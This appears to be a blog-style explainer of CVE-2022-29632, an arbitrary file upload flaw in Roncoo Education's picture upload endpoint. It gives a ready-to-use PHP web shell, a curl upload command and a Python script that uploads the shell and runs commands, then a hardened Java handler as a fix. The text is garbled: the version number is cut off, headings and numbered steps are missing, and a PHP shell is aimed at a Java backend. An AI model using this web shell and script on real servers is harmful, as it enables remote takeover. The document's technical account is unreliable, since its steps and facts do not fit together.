Introduction

In 2022, security researchers identified a critical vulnerability (CVE-2022-29632) in the popular Roncoo Education platform, specifically affecting version 9... This vulnerability allows an attacker to upload any file they want—including malware or scripts—to the server, which could lead to complete compromise through remote code execution (RCE). In this guide, we'll break down how this bug works, how attackers exploit it, and what you can do to protect your systems.

What is Roncoo Education?

Roncoo Education is a widely-used online education platform, especially popular in Asia. Institutions use it for course management, file uploads, and more. Like many web apps, it lets users upload avatars or documents for their courses.

Vulnerability Type: Arbitrary File Upload

- Component: /course/api/upload/pic
- Affected Version: Roncoo Education v9..
- CVE ID: CVE-2022-29632
- Original Reference: Packet Storm Advisory

The problem is rooted in the /course/api/upload/pic endpoint. The server does not properly check the type of the uploaded file or sanitize its name. This means that an attacker can craft a special file—containing malicious code—and upload it, potentially making the server execute that code.

Technical Deep Dive: How the Exploit Works

The normal use of /course/api/upload/pic is to let users upload profile pictures. Typically, servers restrict uploads to safe formats (like JPG or PNG) and store them in locations that can’t execute code. Here, Roncoo Education fails to enforce these rules.

Let's imagine how the backend might look in Java (illustrative, not the vendor's actual source):

import java.io.File;
import java.io.IOException;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.multipart.MultipartFile;

@PostMapping("/course/api/upload/pic")
public ResponseEntity<?> uploadPic(@RequestParam("file") MultipartFile file) throws IOException {
    // The client-supplied name is used verbatim: no extension allowlist, no traversal check
    String fileName = file.getOriginalFilename();
    // Vulnerability: no check on file type or name, and the destination is inside the web root
    File dest = new File("/var/www/html/upload/" + fileName);
    file.transferTo(dest);
    // Returns the web-reachable path to the client
    return ResponseEntity.ok("/upload/" + fileName);
}

What's wrong?

1. Craft a malicious file. For example, a web shell in PHP called shell.php:

<?php system($_GET["cmd"]); ?>

2. Upload it using a tool like curl:

curl -F "file=@shell.php" http://target-site.com/course/api/upload/pic

The server doesn't check the file type and stores shell.php in /upload/.

3. Access the shell via browser:

http://target-site.com/upload/shell.php?cmd=whoami

This request runs whoami on the server, displaying the current user.

4. Achieve Remote Code Execution

You can execute any OS command using the cmd parameter. This gives full remote code execution, allowing data theft, malware deployment, or complete site takeover.

Below is a simple Python script that automates the steps above:

import requests

# Target information
upload_url = "http://target-site.com/course/api/upload/pic"
shell_url = "http://target-site.com/upload/shell.php?cmd=whoami"

# Upload PHP web shell
files = {
    'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')
}
response = requests.post(upload_url, files=files)
print('[+] Upload response:', response.text)

# Access the web shell
result = requests.get(shell_url)
print('[+] Shell result:', result.text)

*Note: This code is for educational purposes only. Never use it on systems you don't own or have permission to test.*

Sanitize Content: Use libraries to check file contents for expected format.

5. Apply Patches: Check the official GitHub repository or the vendor's site for updated versions.

Example Java fix:

String contentType = file.getContentType();
// Content-Type is sent by the client, so treat this as a first filter only;
// the uploaded bytes still need to be checked against the expected format.
// Constant-first equals() also avoids a NullPointerException when the header is absent.
if (!"image/png".equals(contentType) && !"image/jpeg".equals(contentType)) {
    throw new IllegalArgumentException("Invalid file type!");
}
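The snippet above only looks at the client-declared Content-Type. The following is an added example, not code from Roncoo Education or its maintainers, of a hardened replacement for the vulnerable handler sketched earlier. It assumes a Spring Boot controller, an upload directory outside the document root (the path UPLOAD_ROOT, the class name SafeUploadController and the size limit are assumptions for this example), and that stored images are later served by a separate controller rather than as static files. It decides the type from the file's leading bytes, never reuses the client's file name, and stores under a server-generated name so neither path traversal nor a scripting extension can reach the server.

```java
// Added example (not the project's code): hardened upload handler for
// /course/api/upload/pic. UPLOAD_ROOT, MAX_BYTES and the class name are assumptions.
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.StandardCopyOption;
import java.util.Arrays;
import java.util.UUID;

import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.multipart.MultipartFile;

@RestController
public class SafeUploadController {

    // Assumed location outside the document root: nothing written here is reachable
    // by URL directly, and no PHP/JSP handler will ever interpret it.
    private static final Path UPLOAD_ROOT = Paths.get("/srv/roncoo/uploads");
    private static final long MAX_BYTES = 2L * 1024 * 1024;   // assumed 2 MiB avatar limit

    // File signatures ("magic bytes") for the two formats the endpoint is meant to accept.
    private static final byte[] PNG_MAGIC = {(byte) 0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A};
    private static final byte[] JPEG_MAGIC = {(byte) 0xFF, (byte) 0xD8, (byte) 0xFF};

    @PostMapping("/course/api/upload/pic")
    public ResponseEntity<String> uploadPic(@RequestParam("file") MultipartFile file) throws IOException {
        if (file.isEmpty() || file.getSize() > MAX_BYTES) {
            return ResponseEntity.status(HttpStatus.BAD_REQUEST).body("empty or oversized upload");
        }

        // Decide the type from the bytes, not from the client-supplied Content-Type
        // header or the original file name, both of which the attacker controls.
        String extension;
        try (InputStream probe = file.getInputStream()) {
            extension = detectImageExtension(probe);
        }
        if (extension == null) {
            return ResponseEntity.status(HttpStatus.UNSUPPORTED_MEDIA_TYPE).body("only PNG or JPEG accepted");
        }

        // The original name is never used for the stored path: a server-generated name
        // removes traversal ("../") and double-extension ("x.php.png") tricks entirely.
        String storedName = UUID.randomUUID() + "." + extension;
        Path dest = UPLOAD_ROOT.resolve(storedName).normalize();
        if (!dest.startsWith(UPLOAD_ROOT)) {
            // Cannot happen with a UUID name, but keeps the invariant explicit.
            return ResponseEntity.status(HttpStatus.BAD_REQUEST).body("bad path");
        }

        Files.createDirectories(UPLOAD_ROOT);
        try (InputStream in = file.getInputStream()) {
            Files.copy(in, dest, StandardCopyOption.REPLACE_EXISTING);
        }
        // Return an opaque id; a separate controller streams the file back with a
        // fixed image Content-Type instead of exposing the directory as static content.
        return ResponseEntity.ok(storedName);
    }

    /** Returns "png", "jpg", or null when the leading bytes match neither signature. */
    static String detectImageExtension(InputStream in) throws IOException {
        byte[] head = new byte[8];
        int n = in.readNBytes(head, 0, head.length);   // Java 9+
        if (n >= PNG_MAGIC.length && Arrays.equals(Arrays.copyOf(head, PNG_MAGIC.length), PNG_MAGIC)) {
            return "png";
        }
        if (n >= JPEG_MAGIC.length && Arrays.equals(Arrays.copyOf(head, JPEG_MAGIC.length), JPEG_MAGIC)) {
            return "jpg";
        }
        return null;
    }
}
```

With this handler the curl upload shown earlier is rejected with 415 because a PHP file does not begin with a PNG or JPEG signature, and even a file that spoofs the signature lands under a random name outside the web root, where no script engine is mapped to it. Keeping the declared Content-Type check from the snippet above in front of this one is harmless, but on its own it is not a fix.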

References & Further Reading

- CVE-2022-29632 at NVD
- Packet Storm Disclosure
- Roncoo Education GitHub
- OWASP Unrestricted File Upload

Final Notes

Exploits like CVE-2022-29632 show why strict input validation and file handling are critical for web applications. If you’re running Roncoo Education or any similar software, audit your file upload endpoints now—you don't want your platform to be the next headline.


*By simplifying this, we've made a complex and dangerous vulnerability easy to understand. Always test and patch your software, and help keep the web a safer place.*

Timeline

Published on: 05/26/2022 20:15:00 UTC
Last modified on: 06/08/2022 15:54:00 UTC